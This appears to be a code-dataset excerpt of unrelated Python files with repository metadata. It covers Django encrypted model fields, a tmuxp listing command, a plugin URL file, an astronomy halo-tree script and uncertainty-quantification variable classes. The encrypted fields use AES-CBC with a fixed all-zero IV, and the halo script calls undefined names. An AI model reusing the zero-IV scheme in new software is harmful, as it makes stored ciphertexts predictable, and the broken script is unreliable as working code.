self.charset = kwargs.pop('charset', 'utf-8')
if self.cipher_name == 'AES':
if isinstance(self.cipher_key, six.text_type):
self.cipher_key = self.cipher_key.encode(self.charset)
self.cipher_key = aes_pad_key(self.cipher_key)
mod = __import__('Crypto.Cipher', globals(), locals(), [self.cipher_name], 0)
self.cipher_class = getattr(mod, self.cipher_name)
self.check_armor = kwargs.pop('check_armor', True)
self.versioned = kwargs.pop('versioned', False)
super(BaseEncryptedField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return 'TextField'
def south_field_triple(self):
"""
Describe the field to south for use in migrations.
"""
from south.modelsinspector import introspector
args, kwargs = introspector(self)
return "django.db.models.fields.TextField", args, kwargs
def deconstruct(self):
"""
Deconstruct the field for Django 1.7+ migrations.
"""
name, path, args, kwargs = super(BaseEncryptedField, self).deconstruct()
kwargs.update({
#'key': self.cipher_key,
'cipher': self.cipher_name,
'charset': self.charset,
'check_armor': self.check_armor,
'versioned': self.versioned,
})
return name, path, args, kwargs
def get_cipher(self):
"""
Return a new Cipher object for each time we want to encrypt/decrypt. This is because
pgcrypto expects a zeroed block for IV (initial value), but the IV on the cipher
object is cumulatively updated each time encrypt/decrypt is called.
"""
return self.cipher_class.new(self.cipher_key, self.cipher_class.MODE_CBC, b'\0' * self.cipher_class.block_size)
def is_encrypted(self, value):
"""
Returns whether the given value is encrypted (and armored) or not.
"""
return isinstance(value, six.string_types) and value.startswith('-----BEGIN')
def to_python(self, value):
if self.is_encrypted(value):
# If we have an encrypted (armored, really) value, do the following when accessing it as a python value:
# 1. De-armor the value to get an encrypted bytestring.
# 2. Decrypt the bytestring using the specified cipher.
# 3. Unpad the bytestring using the cipher's block size.
# 4. Decode the bytestring to a unicode string using the specified charset.
return unpad(self.get_cipher().decrypt(dearmor(value, verify=self.check_armor)),
self.cipher_class.block_size).decode(self.charset)
return value
def from_db_value(self, value, expression, connection, context):
return self.to_python(value)
def get_db_prep_save(self, value, connection):
if value and not self.is_encrypted(value):
# If we have a value and it's not encrypted, do the following before storing in the database:
# 1. Convert it to a unicode string (by calling unicode).
# 2. Encode the unicode string according to the specified charset.
# 3. Pad the bytestring for encryption, using the cipher's block size.
# 4. Encrypt the padded bytestring using the specified cipher.
# 5. Armor the encrypted bytestring for storage in the text field.
return armor(self.get_cipher().encrypt(pad(force_text(value).encode(self.charset),
self.cipher_class.block_size)), versioned=self.versioned)
return value
class EncryptedTextField (BaseEncryptedField):
description = _('Text')
def formfield(self, **kwargs):
defaults = {'widget': forms.Textarea}
defaults.update(kwargs)
return super(EncryptedTextField, self).formfield(**defaults)
class EncryptedCharField (BaseEncryptedField):
description = _('String')
def __init__(self, *args, **kwargs):
# We don't want to restrict the max_length of an EncryptedCharField
# because of the extra characters from encryption, but we'd like
# to use the same interface as CharField
kwargs.pop('max_length', None)
super(EncryptedCharField, self).__init__(*args, **kwargs)
def formfield(self, **kwargs):
defaults = {'widget': forms.TextInput}
defaults.update(kwargs)
return super(EncryptedCharField, self).formfield(**defaults)
class EncryptedIntegerField (BaseEncryptedField):
description = _('Integer')
field_cast = '::integer'
def formfield(self, **kwargs):
defaults = {'form_class': forms.IntegerField}
defaults.update(kwargs)
return super(EncryptedIntegerField, self).formfield(**defaults)
def to_python(self, value):
if value:
return int(super(EncryptedIntegerField, self).to_python(value))
return value
class EncryptedDecimalField (BaseEncryptedField):
description = _('Decimal number')
field_cast = '::numeric'
def formfield(self, **kwargs):
defaults = {'form_class': forms.DecimalField}
defaults.update(kwargs)
return super(EncryptedDecimalField, self).formfield(**defaults)
def to_python(self, value):
if value:
return decimal.Decimal(super(EncryptedDecimalField, self).to_python(value))
return value
class EncryptedDateField (BaseEncryptedField):
description = _('Date (without time)')
field_cast = '::date'
def __init__(self, verbose_name=None, name=None, auto_now=False, auto_now_add=False, **kwargs):
self.auto_now, self.auto_now_add = auto_now, auto_now_add
if auto_now or auto_now_add:
kwargs['editable'] = False
kwargs['blank'] = True
super(EncryptedDateField, self).__init__(verbose_name, name, **kwargs)
def formfield(self, **kwargs):
defaults = {'widget': forms.DateInput}
defaults.update(kwargs)
return super(EncryptedDateField, self).formfield(**defaults)
def to_python(self, value):
if value in self.empty_values:
return None
unencrypted_value = super(EncryptedDateField, self).to_python(value)
return self._parse_value(unencrypted_value)
def value_to_string(self, obj):
val = self._get_val_from_obj(obj)
return '' if val is None else val.isoformat()
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = self._get_auto_now_value()
setattr(model_instance, self.attname, value)
return value
else:
return super(EncryptedDateField, self).pre_save(model_instance, add)
def _parse_value(self, value):
return models.DateField().to_python(value)
def _get_auto_now_value(self):
return datetime.date.today()
class EncryptedDateTimeField (EncryptedDateField):
description = _('Date (with time)')
field_cast = 'timestamp with time zone'
def formfield(self, **kwargs):
defaults = {'widget': forms.DateTimeInput}
defaults.update(kwargs)
return super(EncryptedDateTimeField, self).formfield(**defaults)
def _parse_value(self, value):
return models.DateTimeField().to_python(value)
def _get_auto_now_value(self):
return timezone.now()
class EncryptedEmailField (BaseEncryptedField):
default_validators = [validators.validate_email]
description = _('Email address')
def formfield(self, **kwargs):
defaults = {'form_class': forms.EmailField}
defaults.update(kwargs)
return super(EncryptedEmailField, self).formfield(**defaults)
if django.VERSION >= (1, 7):
from django.db.models.lookups import Lookup
class EncryptedLookup (Lookup):
def as_postgresql(self, qn, connection):
lhs, lhs_params = self.process_lhs(qn, connection)
rhs, rhs_params = self.process_rhs(qn, connection)
params = lhs_params + [self.lhs.output_field.cipher_key] + rhs_params
rhs = connection.operators[self.lookup_name] % rhs
cipher = {
'AES': 'aes',
'Blowfish': 'bf',
}[self.lhs.output_field.cipher_name]
return "convert_from(decrypt(dearmor(%s), %%s, '%s'), 'utf-8')%s %s" % \
(lhs, cipher, self.lhs.output_field.field_cast, rhs), params
for lookup_name in ('exact', 'gt', 'gte', 'lt', 'lte'):
class_name = 'EncryptedLookup_%s' % lookup_name
lookup_class = type(class_name, (EncryptedLookup,), {'lookup_name': lookup_name})
BaseEncryptedField.register_lookup(lookup_class)
| 6,048 | 2,680 | 242 |
0164ea9a92965c440456dfd2e3e253929b4f943e | 571 | py | Python | tmuxp/cli/ls.py | otherJL0/tmuxp | 52d9c0d3c13556fd5d6ffdb3125fcf3afd0e845d | [
"MIT"
] | 1,615 | 2015-01-05T19:31:48.000Z | 2018-03-09T08:09:20.000Z | tmuxp/cli/ls.py | sthagen/tmuxp | 1c8bfaec3d4f622c4fbc717a873279046c40a664 | [
"MIT"
] | 244 | 2015-02-13T16:24:53.000Z | 2018-03-10T05:15:33.000Z | tmuxp/cli/ls.py | otherJL0/tmuxp | 52d9c0d3c13556fd5d6ffdb3125fcf3afd0e845d | [
"MIT"
] | 118 | 2015-01-16T13:47:39.000Z | 2018-02-07T21:35:31.000Z | import os
import click
from .constants import VALID_CONFIG_DIR_FILE_EXTENSIONS
from .utils import get_config_dir
@click.command(
name="ls",
short_help="List configured sessions in :meth:`tmuxp.cli.utils.get_config_dir`.",
)
| 27.190476 | 85 | 0.681261 | import os
import click
from .constants import VALID_CONFIG_DIR_FILE_EXTENSIONS
from .utils import get_config_dir
@click.command(
name="ls",
short_help="List configured sessions in :meth:`tmuxp.cli.utils.get_config_dir`.",
)
def command_ls():
tmuxp_dir = get_config_dir()
if os.path.exists(tmuxp_dir) and os.path.isdir(tmuxp_dir):
for f in sorted(os.listdir(tmuxp_dir)):
stem, ext = os.path.splitext(f)
if os.path.isdir(f) or ext not in VALID_CONFIG_DIR_FILE_EXTENSIONS:
continue
print(stem)
| 313 | 0 | 22 |
f0c4eea2eb341f55afdd3f15c4cd9f1759fbd1e6 | 131 | py | Python | examplePlugin/urls.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | [
"MIT"
] | null | null | null | examplePlugin/urls.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | [
"MIT"
] | null | null | null | examplePlugin/urls.py | uzairAK/serverom-panel | 3dcde05ad618e6bef280db7d3180f926fe2ab1db | [
"MIT"
] | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.examplePlugin, name='examplePlugin'),
] | 18.714286 | 58 | 0.70229 | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.examplePlugin, name='examplePlugin'),
] | 0 | 0 | 0 |
4105abcfda06aac463d907f00d48142f9f8cdc20 | 1,544 | py | Python | scripts/Halofinding/rsVshm.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z | scripts/Halofinding/rsVshm.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 6 | 2020-02-17T13:44:43.000Z | 2020-06-25T15:35:05.000Z | scripts/Halofinding/rsVshm.py | Hoseung/pyRamAn | f9386fa5a9f045f98590039988d3cd50bc488dc2 | [
"MIT"
] | 1 | 2021-11-25T16:11:56.000Z | 2021-11-25T16:11:56.000Z | # -*- coding: utf-8 -*-
"""
Test resemblance of HM and RS trees
Created on Sun Jun 14 00:33:52 2015
@author: hoseung
"""
# Load HM
from astropy.io import fits
from astropy.table import Table
import tree
wdir = '/home/hoseung/Work/data/AGN2/'
data = fits.getdata(wdir + "halo/TMtree.fits", 1)
hmt = Table(data)
#%%
idgals = [5232, 5495, 5543, 6061, 5491, 6191]
for idgal in idgals:
prg_treex, prg_tree = tree.tmtree.get_main_prg(hmt, idgal, nout_ini=122, nout_fi=0)
print(prg_treex)
#%%
# Load RS
# 3D plot
tree.treeplots(hmt, thisgal, save=save_dir)
#%%
all_final_halo = tru.final_halo_list(hmt)
## ID list
#%%
# mass-produce plots of halo properties.
quantities=["sam_mvir","mvir","rvir","rs","vrms","vmax"
,"jx","jy","jz","spin","m200b","m200c","m500c","m2500c"
,"xoff","voff","btoc","ctoa","ax","ay","az"]
normalizer=np.array([1e-11,1e-11,1,1,1,1,1,1,1e-11
,1,1e-11,1e-11,1e-11,1e-11,1,1,1,1,1,1,1])
for i, hal in enumerate(all_final_halo[0:10]):
print(i, hal)
tree = tru.get_main_prg_tree(hmt, hal)
fn_save = str(hal) + 'halo_all.pdf'
# trp.plot_all(tree, hal, save=True, out_dir=work_dir, fn_save=fn_save,
# nrows=4, ncols=math.ceil(len(quantities)/4),
# quantities=quantities, normalizer=normalizer)
# trp.plot_all_multiPDF(tree, hal, out_dir=work_dir + 'RS_trees/', fn_save=fn_save,
# nrows=2, ncols=2,
# quantities=quantities, normalizer=normalizer)
trp.trajectory3D(tree, hal, save=work_dir + 'RS_trees/') | 26.169492 | 91 | 0.645078 | # -*- coding: utf-8 -*-
"""
Test resemblance of HM and RS trees
Created on Sun Jun 14 00:33:52 2015
@author: hoseung
"""
# Load HM
from astropy.io import fits
from astropy.table import Table
import tree
wdir = '/home/hoseung/Work/data/AGN2/'
data = fits.getdata(wdir + "halo/TMtree.fits", 1)
hmt = Table(data)
#%%
idgals = [5232, 5495, 5543, 6061, 5491, 6191]
for idgal in idgals:
prg_treex, prg_tree = tree.tmtree.get_main_prg(hmt, idgal, nout_ini=122, nout_fi=0)
print(prg_treex)
#%%
# Load RS
# 3D plot
tree.treeplots(hmt, thisgal, save=save_dir)
#%%
all_final_halo = tru.final_halo_list(hmt)
## ID list
#%%
# mass-produce plots of halo properties.
quantities=["sam_mvir","mvir","rvir","rs","vrms","vmax"
,"jx","jy","jz","spin","m200b","m200c","m500c","m2500c"
,"xoff","voff","btoc","ctoa","ax","ay","az"]
normalizer=np.array([1e-11,1e-11,1,1,1,1,1,1,1e-11
,1,1e-11,1e-11,1e-11,1e-11,1,1,1,1,1,1,1])
for i, hal in enumerate(all_final_halo[0:10]):
print(i, hal)
tree = tru.get_main_prg_tree(hmt, hal)
fn_save = str(hal) + 'halo_all.pdf'
# trp.plot_all(tree, hal, save=True, out_dir=work_dir, fn_save=fn_save,
# nrows=4, ncols=math.ceil(len(quantities)/4),
# quantities=quantities, normalizer=normalizer)
# trp.plot_all_multiPDF(tree, hal, out_dir=work_dir + 'RS_trees/', fn_save=fn_save,
# nrows=2, ncols=2,
# quantities=quantities, normalizer=normalizer)
trp.trajectory3D(tree, hal, save=work_dir + 'RS_trees/') | 0 | 0 | 0 |
3b29ed288583c49b6b5414b265a987a5d61de758 | 54,054 | py | Python | src/PCE_Codes/variables/continuous.py | nasa/UQPCE | 64f2143cddf83ca2e835442db2fc9ef33c6d26be | [
"NASA-1.3"
] | 13 | 2020-11-07T22:03:35.000Z | 2022-01-12T22:08:53.000Z | src/PCE_Codes/variables/continuous.py | nasa/UQPCE | 64f2143cddf83ca2e835442db2fc9ef33c6d26be | [
"NASA-1.3"
] | null | null | null | src/PCE_Codes/variables/continuous.py | nasa/UQPCE | 64f2143cddf83ca2e835442db2fc9ef33c6d26be | [
"NASA-1.3"
] | 4 | 2020-11-23T16:24:03.000Z | 2022-03-25T01:25:21.000Z | from builtins import setattr, getattr
from fractions import Fraction
import math
from multiprocessing import Process, Manager
from warnings import warn, showwarning
try:
from sympy import *
import numpy as np
from scipy.stats import norm, beta, gamma, expon
from scipy.linalg import pascal
from scipy.integrate import quad
from sympy import (
symbols, zeros, integrate, N, factorial, sqrt, simplify, sympify, Abs
)
from sympy.core.numbers import NaN
from sympy.integrals.integrals import Integral
from sympy.parsing.sympy_parser import parse_expr
from sympy.solvers import solve
from sympy.utilities.lambdify import lambdify
from mpi4py import MPI
from mpi4py.MPI import (
COMM_WORLD as MPI_COMM_WORLD, DOUBLE as MPI_DOUBLE, MAX as MPI_MAX
)
except:
warn('Ensure that all required packages are installed.')
exit()
from PCE_Codes.custom_enums import Distribution, UncertaintyType
from PCE_Codes._helpers import _warn, uniform_hypercube
from PCE_Codes.variables.variable import Variable
from PCE_Codes.error import VariableInputError
class ContinuousVariable(Variable):
"""
Inputs: pdf- the equation that defines the pdf of the variable values
interval_low- the low interval of the variable
interval_high- the high interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Class represents a continuous variable.
"""
def get_probability_density_func(self):
"""
Turns the input function into the corresponding probability density
function.
"""
diff_tol = 1e-5
tol = 1e-12
f = lambdify(self.x, self.distribution, ('numpy', 'sympy'))
const = quad(f, self.low_approx, self.high_approx, epsabs=tol, epsrel=tol)[0]
const_rnd = np.round(const)
if np.abs(const_rnd - const) < diff_tol:
const = const_rnd
self.distribution = self.distribution / const
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
For each variable, it adds a new attribute for the standardized values
from the original input values.
"""
setattr(self, std_vals, getattr(self, orig))
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return values # general variable must already be standardized
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return value # general variable must already be standardized
def check_distribution(self):
"""
Checks all values in an array to ensure that they are standardized.
"""
comm = MPI_COMM_WORLD
rank = comm.rank
mx = np.max(self.std_vals)
mn = np.min(self.std_vals)
if rank == 0 and mx > self.high_approx or mn < self.low_approx:
warn(
f'Large standardized value for variable {self.name} '
'with user distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Generates points according to the Latin hypercube; each point is in an
interval of equal probability.
"""
decimals = 30
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
is_manager = (rank == 0)
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.inverse_func = None
self.failed = None
try:
y = symbols('y')
if self.failed != None:
raise AttributeError # skip if has already gone through and failed
# solve for the cumulative density function with 10s timeout
if is_manager and not hasattr(self, 'cum_dens_func'):
manager = Manager()
proc_dict = manager.dict()
cdf_proc = Process(target=self._calc_cdf, args=(proc_dict,))
cdf_proc.start()
cdf_proc.join(10.0)
if cdf_proc.is_alive():
cdf_proc.terminate()
try:
self.cum_dens_func = proc_dict['cum_dens_func']
# solve for the inverse function with 10s timeout
inv_proc = Process(target=self._invert, args=(proc_dict,))
inv_proc.start()
inv_proc.join(10.0)
if inv_proc.is_alive():
inv_proc.terminate()
self.inverse_func = proc_dict['inverse_func']
except KeyError:
self.failed = 1
self.failed = comm.bcast(self.failed, root=0)
if not self.failed:
self.inverse_func = comm.bcast(self.inverse_func, root=0)
else:
raise ValueError
# plug in random uniform 0 -> 1 to solve for x vals
all_samples = np.zeros(samp_size)
for i in range(len(self.inverse_func)): # multiple solutions
inv_func = (
np.vectorize(
lambdify(y, str(self.inverse_func[i]), ('numpy', 'sympy'))
)
)
samples = N(inv_func(uniform_hypercube(0, 1, count)), decimals)
comm.Allgatherv(
[samples, count, MPI_DOUBLE],
[all_samples, seq_count, seq_disp, MPI_DOUBLE]
)
if np.min(all_samples) >= self.low_approx and np.max(all_samples) <= self.high_approx:
np.random.shuffle(all_samples)
return all_samples
if not (
(np.min(samples) >= self.low_approx) and (np.max(samples) <= self.high_approx)
):
raise ValueError
# if cdf or inverse func can't be found, use rejection-acceptance sampling
except (ValueError, NameError, AttributeError):
func = lambdify(self.x, self.distribution, ('numpy', 'sympy'))
try_total = 5000
tries = try_total // size + (rank < try_total % size)
max_all = np.zeros(1)
try:
max_val = (
np.max(func(
np.random.uniform(
self.low_approx, self.high_approx, tries
)
))
)
except RuntimeError:
max_val = np.max(
func(
np.random.uniform(
self.low_approx, self.high_approx, tries
)
)
).astype(float)
comm.Allreduce(
[max_val, MPI_DOUBLE], [max_all, MPI_DOUBLE], op=MPI_MAX
)
samples = np.zeros(count)
all_samples = np.zeros(samp_size)
i = 0
j = 0
y_vals = np.random.uniform(0, max_all, count)
x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
func_vals = func(x_vals)
# while loop until all 'samp_size' samples have been generated
while i < count:
if j == count:
y_vals = np.random.uniform(0, max_all, count)
x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
func_vals = func(x_vals)
j = 0
if y_vals[j] <= func_vals[j]:
samples[i] = x_vals[j]
i += 1
j += 1
comm.Allgatherv(
[samples, count, MPI_DOUBLE],
[all_samples, seq_count, seq_disp, MPI_DOUBLE]
)
np.random.shuffle(all_samples)
return all_samples
def create_norm_sq(self, low, high, func):
"""
Inputs: low- the low interval bound for the distribution
high- the high interval bound for the distribution
func- the function corresponding to the distribution
Calculates the norm squared values up to the order of polynomial
expansion based on the probability density function and its
corresponding orthogonal polynomials.
"""
orthopoly_count = len(self.var_orthopoly_vect)
self.norm_sq_vals = np.zeros(orthopoly_count)
tries = 2
zero = 0
# is rounded off at 50 decimals, requiring two decimals places
norm_sq_thresh = 1e-49
for i in range(orthopoly_count):
proc_dict = {}
for j in range(tries):
self._norm_sq(low, high, func, i, j, proc_dict)
try:
if (proc_dict['out'] is not None) and (not math.isclose(proc_dict['out'], zero)):
self.norm_sq_vals[i] = proc_dict['out']
break # only breaks inner loop
except KeyError:
pass
if (self.norm_sq_vals == zero).any():
warn(f'Finding the norm squared for variable {self.name} failed.')
if (self.norm_sq_vals <= norm_sq_thresh).any():
warn(
f'At least one norm squared value for variable {self.name} is '
f'very small. This can introduce error into the model.'
)
def _norm_sq(self, low, high, func, i, region, proc_dict):
"""
Inputs: low- the low interval bound for the distribution
high- the high interval bound for the distribution
func- the function corresponding to the distribution
i- the index of the norm squared to calculate
region- which sympy calculation to try for the norm squared
proc_dict- the dictionary in which the output will be stored
An assistant to create_norm_sq; allows the norm squared calculations to
have a timeout if an error isn't raised and the solution isn't found
reasonably quickly.
"""
proc_dict['out'] = None
# round 0.99999999 to 1 to reduce error; if value is small, don't round
thresh = 1e-2
tol = 1e-12
diff_tol = 1e-8
decimals = 30
if high == 'oo':
ul = np.inf
elif high == 'pi':
ul = np.pi
elif high == '-pi':
ul = -np.pi
else:
ul = high
if low == '-oo':
ll = -np.inf
elif low == 'pi':
ll = np.pi
elif low == '-pi':
ll = -np.pi
else:
ll = low
if region == 0:
try:
f = lambdify(self.x, func * self.var_orthopoly_vect[i] ** 2, ('numpy', 'sympy'))
ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
if np.abs(int(ans) - ans) < diff_tol:
proc_dict['out'] = int(ans)
elif ans > thresh:
proc_dict['out'] = round(ans, 7)
else:
proc_dict['out'] = ans
except:
pass
elif region == 1:
try:
f = lambdify(
self.x,
N(func * self.var_orthopoly_vect[i] ** 2, decimals),
('numpy', 'sympy')
)
ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
if np.abs(int(ans) - ans) < diff_tol:
proc_dict['out'] = int(ans)
elif ans > thresh:
proc_dict['out'] = round(ans, 7)
else:
proc_dict['out'] = ans
except:
pass
elif region == 2:
try:
f = lambdify(
self.x,
sympify(f'{func} * ({self.var_orthopoly_vect[i]}) ** 2'),
('numpy', 'sympy')
)
ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
if np.abs(int(ans) - ans) < diff_tol:
proc_dict['out'] = int(ans)
elif ans > thresh:
proc_dict['out'] = round(ans, 7)
else:
proc_dict['out'] = ans
except:
pass
def recursive_var_basis(self, func, low, high, order):
"""
Inputs: func- the probability density function of the input equation
low- the low bound on the variable
high- the high bound on the variable
order- the order of polynomial expansion
Recursively calculates the variable basis up to the input 'order'.
"""
tol = 1e-12
if low == '-oo':
low = -np.inf
if high == 'oo':
high = np.inf
if order == 0:
self.poly_denom = np.zeros(self.order, dtype=object)
self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
self.var_orthopoly_vect[order] = 1
return
else:
self.recursive_var_basis(func, low, high, order - 1)
curr = self.x ** order
for i in range(order):
orthopoly = self.var_orthopoly_vect[i]
if self.poly_denom[i] == 0:
f = lambdify(self.x, orthopoly ** 2 * func, ('numpy', 'sympy'))
self.poly_denom[i] = quad(f, low, high, epsabs=tol, epsrel=tol)[0]
f = lambdify(self.x, self.x ** order * orthopoly * func, ('numpy', 'sympy'))
intergal_eval = (
quad(f, low, high, epsabs=tol, epsrel=tol)[0]
/ self.poly_denom[i]
) * orthopoly
curr -= intergal_eval
self.var_orthopoly_vect[order] = curr
if order == self.order and (self.var_orthopoly_vect == 0).any():
warn(
f'Variable {self.name} has at least one orthogonal polynomial '
f'that is zero. The model may not be accurate'
)
return
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Generates samp_size number of samples according to the pdf of the
Variable.
"""
self.resample = self.generate_samples(samp_size)
return self.resample
def _calc_cdf(self, proc_dict):
"""
Inputs: proc_dict- the dictionary in which the output will be stored
Calculates the cumulative density function of the distribution.
"""
try:
proc_dict['cum_dens_func'] = integrate(
self.distribution, (self.x, self.interval_low, self.x)
)
except RuntimeError:
pass
def _invert(self, proc_dict):
"""
Inputs: proc_dict- the dictionary in which the output will be stored
Solves for the inverse function of the cumulative density function.
"""
y = symbols('y')
try:
proc_dict['inverse_func'] = solve(f'{self.cum_dens_func}-y', self.x)
except (NameError, NotImplementedError, AttributeError, RuntimeError):
pass
def check_num_string(self):
"""
Checks for values in the input file that correspond to pi, -oo, or oo.
If these values exist, they are converted into values that Python can
use to create resampling points.
"""
decimals = 30
if self.interval_low == '-oo' or self.interval_high == 'oo':
x = self.x
integrate_tuple = (x, self.interval_low, self.interval_high)
self.mean = integrate(x * self.distribution, integrate_tuple)
stdev = (
math.sqrt(
integrate(x ** 2 * self.distribution, integrate_tuple)
-self.mean ** 2
)
)
if isinstance(self.interval_low, str):
if 'pi' in self.interval_low:
temp_low = float(self.interval_low.replace('pi', str(np.pi)))
self.interval_low = temp_low
self.low_approx = temp_low
elif self.interval_low == '-oo':
self.low_approx = N(self.mean - 10 * stdev, decimals)
if isinstance(self.interval_high, str):
if 'pi' in self.interval_high:
temp_high = float(self.interval_high.replace('pi', str(np.pi)))
self.interval_high = temp_high
self.high_approx = temp_high
elif self.interval_high == 'oo':
self.high_approx = N(self.mean + 10 * stdev, decimals)
def get_mean(self):
"""
Return the mean of the variable.
"""
decimals = 30
if not hasattr(self, 'mean'):
x = self.x
integrate_tuple = (x, self.interval_low, self.interval_high)
self.mean = integrate(x * self.distribution, integrate_tuple)
return N(self.mean, decimals)
class UniformVariable(ContinuousVariable):
"""
Inputs: interval_low- the low interval of the variable
interval_high- the high interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a uniform variable. The methods in this class correspond to
those of a uniform variable.
"""
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a uniform variable up to the
order of polynomial expansion.
"""
self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
x = self.x
for n in range(self.order + 1):
if n == 0:
self.var_orthopoly_vect[n] = 1
elif n == 1:
self.var_orthopoly_vect[n] = x
else:
self.var_orthopoly_vect[n] = (
(
(2 * n - 1) * x
* self.var_orthopoly_vect[n - 1] - (n - 1)
* self.var_orthopoly_vect[n - 2]
)
/ n
)
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a uniform distribution.
"""
original = getattr(self, orig)
mean = (
(self.interval_high - self.interval_low) / 2 + self.interval_low
)
stdev = (self.interval_high - self.interval_low) / 2
standard = (original[:] - mean) / stdev
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
mean = (
(self.interval_high - self.interval_low) / 2 + self.interval_low
)
stdev = (self.interval_high - self.interval_low) / 2
return (values - mean) / stdev
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
mean = (
(self.interval_high - self.interval_low) / 2 + self.interval_low
)
stdev = (self.interval_high - self.interval_low) / 2
return (value * stdev) + mean
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
a uniform distribution.
"""
if (
(np.max(self.std_vals) > 1 + 1e-5)
or (np.min(self.std_vals) < -1 - 1e-5)
):
warn(
f'Standardized value for variable {self.name} with uniform '
'distribution outside expected [-1, 1] bounds'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
a uniform distribution.
"""
vals = (
uniform_hypercube(self.interval_low, self.interval_high, samp_size)
)
return vals
def get_norm_sq_val(self, matrix_val):
"""
Inputs: matrix_val- the value in the model matrix to consider
Overrides the Variable class get_norm_sq_val to align with
a uniform distribution.
"""
return 1.0 / (2.0 * matrix_val + 1.0)
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
a uniform distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.uniform(-1, 1, count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = -1
self.resample[1] = 1
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))
if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
return (self.interval_high - self.interval_low) / 2 + self.interval_low
class NormalVariable(ContinuousVariable):
"""
Inputs: mean- the mean of the variable
stdev- the standard deviation of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a normal variable. The methods in this class correspond to
those of a normal variable.
"""
__slots__ = ('mean', 'stdev')
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a normal variable up to the
order of polynomial expansion.
"""
self.var_orthopoly_vect = zeros(self.order + 1, 1)
x = self.x
for n in range(self.order + 1):
if n == 0:
self.var_orthopoly_vect[n] = 1
elif n == 1:
self.var_orthopoly_vect[n] = 2 * x
else:
self.var_orthopoly_vect[n] = (
2 * x * self.var_orthopoly_vect[n - 1] - 2 * (n - 1)
* self.var_orthopoly_vect[n - 2]
)
for n in range(self.order + 1): # transform into probabalists Hermite poly
self.var_orthopoly_vect[n] = (
2 ** (-n / 2)
* self.var_orthopoly_vect[n].subs({x:x / math.sqrt(2)})
)
self.var_orthopoly_vect = np.array(self.var_orthopoly_vect).astype(object).T[0]
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a normal distribution.
"""
original = getattr(self, orig)
standard = (original[:] - self.mean) / (self.stdev)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return (values - self.mean) / (self.stdev)
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return (value * self.stdev) + self.mean
def check_distribution(self):
"""
